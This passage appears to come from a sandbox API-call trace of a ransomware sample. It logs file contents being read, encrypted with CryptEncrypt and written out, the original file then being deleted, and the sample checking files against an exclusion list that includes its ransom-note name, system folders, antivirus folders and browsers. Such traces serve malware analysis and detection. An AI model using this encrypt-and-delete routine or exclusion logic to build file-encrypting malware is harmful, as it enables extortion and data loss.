(in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.179] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.179] GetLastError () returned 0x0 [0157.179] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.179] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.179] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.179] GetLastError () returned 0x0 [0157.179] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.179] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.180] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.180] GetLastError () returned 0x0 [0157.180] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.180] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.180] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.180] GetLastError () returned 0x0 [0157.180] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.180] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.180] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.180] GetLastError () returned 0x0 [0157.180] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.180] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.180] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.180] GetLastError () returned 0x0 [0157.180] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.180] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.180] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.180] GetLastError () returned 0x0 [0157.180] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.181] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.181] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.181] GetLastError () returned 0x0 [0157.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.181] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.181] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.181] GetLastError () returned 0x0 [0157.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.181] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.181] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.181] GetLastError () returned 0x0 [0157.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.181] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.181] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.181] GetLastError () returned 0x0 [0157.181] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.181] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.181] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.182] GetLastError () returned 0x0 [0157.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.182] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x4b, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x4b, lpOverlapped=0x0) returned 1 [0157.182] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x4b, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x50) returned 1 [0157.182] GetLastError () returned 0x0 [0157.182] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x50, lpOverlapped=0x0) returned 1 [0157.182] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.182] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml")) returned 0x20 [0157.182] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", dwFileAttributes=0x20) returned 0 [0157.183] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 1 [0157.183] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml")) returned 0 [0157.183] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" [0157.183] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.183] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD935.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd935.tmp")) returned 0xd935 [0157.184] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD935.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd935.tmp"), dwFlags=0x1) returned 0 [0157.184] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD935.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd935.tmp")) returned 1 [0157.185] CryptDestroyKey (hKey=0x9ad838) returned 1 [0157.185] wcslen (_String="OK") returned 0x2 [0157.185] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.185] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.185] CryptDestroyKey (hKey=0x9ad438) returned 1 [0157.185] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0157.185] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0157.185] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*NMCRYPT") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*Recovers your files.html") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.exe") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.dll") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.lnk") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.bat") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.ini") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.msi") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*.scf") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*pagefile.sys*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*AppData*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\winrar\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\java\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\windows\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\ESET\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\AVG\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*Atheros*") returned 0 [0157.185] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*Realtek*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*bootmgr*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*boot*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*boot*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*IO.SYS*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*ntldr*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*chrome*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*opera*") returned 0 [0157.186] PathMatchSpecW (pszFile="zh-dayi.xml", pszSpec="*firefox*") returned 0 [0157.186] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", pszSpec="*") returned 1 [0157.186] strlen (_Str="NMoreira") returned 0x8 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.187] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.188] CryptGenRandom 